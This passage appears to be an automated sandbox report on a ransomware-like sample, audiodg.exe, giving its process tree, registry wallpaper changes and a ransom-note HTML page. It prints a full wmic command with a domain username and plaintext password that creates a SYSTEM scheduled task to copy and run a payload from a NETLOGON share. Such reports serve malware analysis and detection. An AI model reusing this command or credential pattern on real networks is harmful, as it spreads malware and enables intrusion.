of 432 2008 cmd.exe 37 PID 2008 wrote to memory of 432 2008 cmd.exe 37 PID 1520 wrote to memory of 1640 1520 audiodg.exe 38 PID 1520 wrote to memory of 1640 1520 audiodg.exe 38 PID 1520 wrote to memory of 1640 1520 audiodg.exe 38 PID 1520 wrote to memory of 1640 1520 audiodg.exe 38 PID 1640 wrote to memory of 1604 1640 cmd.exe 39 PID 1640 wrote to memory of 1604 1640 cmd.exe 39 PID 1640 wrote to memory of 1604 1640 cmd.exe 39 PID 1640 wrote to memory of 1604 1640 cmd.exe 39 PID 1520 wrote to memory of 1196 1520 audiodg.exe 40 PID 1520 wrote to memory of 1196 1520 audiodg.exe 40 PID 1520 wrote to memory of 1196 1520 audiodg.exe 40 PID 1520 wrote to memory of 1196 1520 audiodg.exe 40 PID 1196 wrote to memory of 1524 1196 cmd.exe 41 PID 1196 wrote to memory of 1524 1196 cmd.exe 41 PID 1196 wrote to memory of 1524 1196 cmd.exe 41 PID 1196 wrote to memory of 1524 1196 cmd.exe 41 PID 1520 wrote to memory of 1392 1520 audiodg.exe 42 PID 1520 wrote to memory of 1392 1520 audiodg.exe 42 PID 1520 wrote to memory of 1392 1520 audiodg.exe 42 PID 1520 wrote to memory of 1392 1520 audiodg.exe 42 PID 1392 wrote to memory of 1388 1392 cmd.exe 43 PID 1392 wrote to memory of 1388 1392 cmd.exe 43 PID 1392 wrote to memory of 1388 1392 cmd.exe 43 PID 1392 wrote to memory of 1388 1392 cmd.exe 43 PID 1496 wrote to memory of 1872 1496 iexplore.exe 52 PID 1496 wrote to memory of 1872 1496 iexplore.exe 52 PID 1496 wrote to memory of 1872 1496 iexplore.exe 52 PID 1496 wrote to memory of 1872 1496 iexplore.exe 52 PID 1368 wrote to memory of 472 1368 iexplore.exe 58 PID 1368 wrote to memory of 472 1368 iexplore.exe 58 PID 1368 wrote to memory of 472 1368 iexplore.exe 58 PID 1368 wrote to memory of 472 1368 iexplore.exe 58
Processes
-
C:\Users\Admin\AppData\Local\Temp\audiodg.exe"C:\Users\Admin\AppData\Local\Temp\audiodg.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"3⤵
- Modifies data under HKEY_USERS
PID:1472
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe %windir%lsamp.exe & start %windir%lsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"2⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe C:\Windowslsamp.exe & start C:\Windowslsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"3⤵
- Modifies data under HKEY_USERS
PID:292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"3⤵
- Modifies data under HKEY_USERS
PID:432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-103686315-404690609-2047157615-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-21-103686315-404690609-2047157615-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"3⤵
- Sets desktop wallpaper using registry
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-103686315-404690609-2047157615-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-21-103686315-404690609-2047157615-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"3⤵
- Modifies registry class
PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"2⤵
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\ECes1Ma81x0h.bmp"3⤵
- Modifies data under HKEY_USERS
PID:1388
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:1028
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5501⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\HELP_SECURITY_EVENT.html1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1496 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1872
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:960
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\HELP_SECURITY_EVENT.html1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1368 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:472
-